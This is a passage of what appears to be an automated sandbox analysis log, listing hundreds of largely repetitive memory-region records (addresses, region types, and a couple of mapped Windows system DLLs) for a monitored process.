pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10059 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10060 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10061 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10062 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10063 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10064 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10065 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10066 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10067 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10068 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10069 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10070 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10071 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10072 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10073 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10074 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10075 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10076 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10077 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10078 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10079 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10080 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10081 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10082 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10083 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10084 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10085 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10086 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10087 start_va = 0x7ffb21b50000 end_va = 0x7ffb21b85fff monitored = 0 entry_point = 0x7ffb21b60070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 10455 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 10456 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 10457 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10458 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10459 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10460 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10461 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10462 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10463 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10464 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10465 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10466 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10467 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10468 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10469 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10470 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10471 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10472 start_va = 0xc870000 end_va = 0xcd62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c870000" filename = "" Region: id = 10473 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10474 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10475 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10476 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10477 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10478 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10479 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10480 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10481 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10482 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10483 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10484 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10485 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10486 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10487 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10488 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10489 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10490 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10491 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10492 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10493 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10494 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10495 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10496 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10497 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10498 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10499 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10500 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10501 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10502 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10503 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10504 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10505 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10506 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10507 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10508 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10509 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10510 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10511 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10512 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10513 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10514 start_va = 0xd770000 end_va = 0xdc61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d770000" filename = "" Region: id = 10515 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10516 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10517 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10518 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10519 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10520 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10521 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10522 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10523 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10524 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10525 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10526 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10527 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10528 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10529 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10530 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10531 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10532 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10533 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10534 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10535 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10536 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10537 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10538 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10539 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10540 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10541 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10542 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10543 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10544 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10545 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10546 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10547 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10548 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10549 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10550 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10551 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10552 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10553 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10554 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10555 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10556 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10557 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10558 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10559 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10560 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10561 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10562 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10563 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 10564 start_va = 0x2880000 end_va = 0x2883fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 10565 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 10566 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 10567 start_va = 0x41d0000 end_va = 0x41defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 10568 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10569 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10570 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10571 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10572 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10573 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10574 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10575 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10576 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10577 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10578 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10579 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10580 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10581 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10582 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10583 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10584 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10585 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10586 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10587 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10588 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10589 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10590 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10591 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10592 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10593 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 10594 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10595 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10596 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10597 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10598 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10599 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10600 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10601 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10602 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10603 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10604 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10605 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10606 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10607 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10608 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10609 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10610 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10611 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 